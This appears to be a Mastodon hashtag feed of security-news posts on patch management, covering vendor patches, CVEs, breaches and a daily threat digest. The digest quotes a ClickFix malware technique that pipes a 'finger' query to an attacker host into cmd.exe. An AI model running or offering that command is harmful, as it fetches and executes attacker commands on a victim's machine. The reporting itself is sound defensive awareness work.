ICYMI: Action1 platform now offers autonomous patch management across all major operating systems
https://www.admin-magazine.com/News/Action1-Now-Includes-Linux-Patch-Management?utm_source=mam
#Action1 #PatchManagement #Linux #AEM #enterprise #PowerShell #Windows #macOS
#patchmanagement
Umfassender Schutz für geschäftskritische SAP-Systeme: Strategien und Best Practices
Angesichts raffinierter Angriffe, die neue Schwachstellen binnen 72 Stunden ausnutzen, während Unternehmen durchschnittlich drei Monate für das Patching benötigen, wächst die Bedrohungslage exponentiell.
🔧 Yesterday, #SAP released 14 new security notes, including several critical ones. Highlights: • Solution Manager code-injection vuln (CVSS 9.9) • Fixes for Commerce Cloud, jConnect, Web Dispatcher/ICM 🔗 Learn more and patch today: support.sap.com/en/my-suppor... #SAPSecurity #PatchManagement
Action1 announces expansion of its platform to include Linux patch management and autonomous endpoint management
https://www.admin-magazine.com/News/Action1-Now-Includes-Linux-Patch-Management?utm_source=mam
#Action1 #Linux #PatchManagement #AEM #enterprise #automation #PowerShell
📅 Outdated software = open doors for attackers.
⚠️ Always monitor end-of-life dates and upgrade before support ends.
👉 https://zurl.co/FK3Ru
⚙️ Outdated software is a hacker’s best friend.
🔒 Keep your operating system and apps updated—patches close security holes fast.
👉 https://zurl.co/SKauQ
ASUS has patched a high-severity local privilege escalation flaw (CVE-2025-59373) in MyASUS that allowed elevation to NT AUTHORITY/SYSTEM via the System Control Interface Service. Patch now shipped through Windows Update with updated versions for x64 and ARM.
#infosec #vulnerability #ASUS #WindowsSecurity #patchmanagement #CVE2025
This week brought a cascade of urgent security patches as attackers accelerated their exploitation of newly discovered vulnerabilities across enterprise software.
#ZeroDay #Cybersecurity #Vulnerabilities #Malware #PatchManagement
https://cybernewsweekly.substack.com/p/cybersecurity-news-review-week-47-27a
Morning, cyber pros! It's been a bit light on news over the last 24 hours, but we've still got some critical updates to chew on. We're looking at a major data breach, an actively exploited RCE vulnerability, an old protocol making a malicious comeback, and a significant legal crackdown on North Korean illicit activities. Let's dive in:
Logitech Hit by Clop Extortion ⚠️
- Hardware giant Logitech has confirmed a data breach following an extortion claim by the Clop gang, who leaked 1.8 TB of data.
- The breach stemmed from a third-party zero-day vulnerability, likely CVE-2025-61882 in Oracle E-Business Suite, which Clop actively exploited in July 2025.
- While Logitech states no sensitive national ID or credit card data was compromised, the incident highlights Clop's consistent use of zero-days in mass data theft campaigns, previously seen with Accellion, GoAnywhere, and MOVEit.
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/logitech-confirms-data-breach-after-clop-extortion-attack/
RondoDox Botnet Exploiting XWiki RCE 🛡️
- The RondoDox botnet is actively exploiting CVE-2025-24893, a critical eval injection vulnerability (CVSS 9.8) in unpatched XWiki instances, to achieve arbitrary code execution.
- This flaw allows any guest user to execute remote code via a request to the "/bin/get/Main/SolrSearch" endpoint, and has been in the wild since at least March 2025.
- CISA added this to its KEV catalog, urging federal agencies to patch by November 20th. Exploitation attempts have surged, with RondoDox adding these devices to its botnet for DDoS attacks, alongside other actors deploying crypto miners and reverse shells.
📰 The Hacker News | https://thehackernews.com/2025/11/rondodox-exploits-unpatched-xwiki.html
'Finger' Protocol Abused for Malware Delivery 🕵️
- Threat actors are leveraging the decades-old 'finger' protocol (TCP port 79) to retrieve and execute remote commands on Windows devices in recent ClickFix malware attacks.
- The technique involves piping the output of a 'finger' command (e.g., `finger vke@finger.cloudmega[.]org`) directly into `cmd.exe`, causing the retrieved commands to run locally.
- Observed campaigns deliver Python-based infostealers or NetSupport Manager RAT, with some variants including anti-analysis checks for tools like Wireshark and Process Hacker. Defenders should block outgoing traffic to TCP port 79.
🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/
US Cracks Down on North Korean IT Worker Fraud ⚖️
- Five U.S. citizens have pleaded guilty to assisting North Korea's illicit revenue generation by enabling IT worker fraud, impacting over 136 U.S. companies and generating $2.2 million for the DPRK regime.
- The schemes involved using stolen U.S. identities, hosting company laptops in "laptop farms," and facilitating remote access to make it appear workers were in the U.S.
- This legal action, alongside the forfeiture of over $15 million in cryptocurrency stolen by APT38 (BlueNoroff), underscores ongoing efforts to disrupt North Korea's funding for its weapons programmes.
📰 The Hacker News | https://thehackernews.com/2025/11/five-us-citizens-plead-guilty-to.html
#CyberSecurity #ThreatIntelligence #DataBreach #Clop #Ransomware #ZeroDay #Vulnerability #RCE #XWiki #Botnet #DDoS #Malware #FingerProtocol #ClickFix #NorthKorea #DPRK #APT38 #BlueNoroff #Cybercrime #InfoSec #IncidentResponse #PatchManagement
Viele reden über Cyber-Resilienz – die Realität in den Netzen sagt etwas anderes: 39% der IT-Geräte laufen ohne aktive Endpoint-Protection, 77% der Unternehmensnetzwerke sind unzureichend segmentiert, 32,5% der Geräte operieren außerhalb der IT-Kontrolle, 26% der Linux- und 8% der Windows-Systeme sind veraltet und ungepatcht. #CyberSecurity #Risikomanagement #ITSecurity #EndpointSecurity #EDR #PatchManagement #Netzwerksegmentierung #ZeroTrust #PaloAlto
Wie organisiert ihr euer Patch-Management?
(Server, Endnutzergeräte, mobile devices, etc...)
A single image on WhatsApp turned a Samsung Galaxy into a hacker’s playground—no click needed. How did this zero-day flaw let attackers spy on your phone? Find out the details behind the stealthy exploit.
#samsung
#zeroday
#androidsecurity
#cve202521042
#spyware
#cyberespionage
#patchmanagement
#mobilevulnerabilities
#cisa
QNAP's NAS devices just got hit with seven zero-day flaws at Pwn2Own Ireland 2025. Is your data really safe when hackers can break through live? Dive into the details before updating becomes a must.
#qnap
#zeroday
#pwn2own
#nassecurity
#cybersecurity
#vulnerability
#dataprotection
#patchmanagement
#infosec
Another day, another breach. The Congressional Budget Office confirms a hack, with whispers that an ancient, unpatched firewall is to blame. It's almost like patching is important or something. 😉 What's your biggest 'should've patched that' horror story? #TechNews #SecurityBreach #PatchManagement #SystemAdmin https://techcrunch.com/2025/11/07/congressional-budget-office-confirms-it-was-hacked/
Cisco firewalls are under fire—state-sponsored hackers exploiting zero-day flaws to force reboot loops and take down networks. Is your security ready for the threat? Learn what you need to know before it’s too late.
#ciscofirewall
#zeroday
#dosattacks
#cybersecurity
#patchmanagement
Cisco's latest UCCX flaw lets hackers run commands as root—opening the door to a cascade of vulnerabilities across your network. Is your system ready for this wake-up call?
A single overlooked input in CentOS Web Panel turned into a full-blown takeover—attackers hacked servers with no password needed. How did one bug spark such a cybersecurity uproar? Read on to get the inside scoop.
#centoswebpanel
#cve202548703
#vulnerabilityanalysis
#cybersecurity
#patchmanagement
🔥 PatchMon: Nền tảng tự động hóa theo dõi bản vá Linux! Phiên bản FOSS (Mở miễn phí) có đầy đủ tính năng như bản trả phí - chỉ thiếu hỗ trợ. Đáng chú ý cho người dùng tự lưu trữ! #Linux #FOSS #BảoMật #TechVietNam #OpenSource #PatchManagement #HệThốngLinux #DevOps Vietnam 🇻🇳
(NONE: Not applicable. The post provides useful info about a free/opensource tool for Linux patch monitoring.)
https://www.reddit.com/r/selfhosted/comments/1ooktqe/patchmonpatchmon_linux_patch_monitoring/
Microsoft Partially Reverses Windows Update Naming Change After Administrator Backlash
#Windows11 #Microsoft #WindowsUpdate #ITAdmins #SysAdmin #PatchManagement #Windows11 #BigTech
Exchange in Deutschland – ein Altlastenproblem mit Ansage! Zehntausende on‑prem Exchange‑Server in Deutschland sind weiterhin exponiert – oft ungepatcht, veraltet und mit offen erreichbaren Diensten. Solange zentrale Kommunikationssysteme nicht wie produktive Assets der Stufe „geschäftskritisch“ behandelt werden, bleibt Exchange das perfekte Einfallstor – nicht wegen APT‑Magie, sondern wegen Management‑Defiziten. #CyberSecurity #ExchangeServer #PatchManagement #BSI #Ransomware #EoL
Client Info
Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst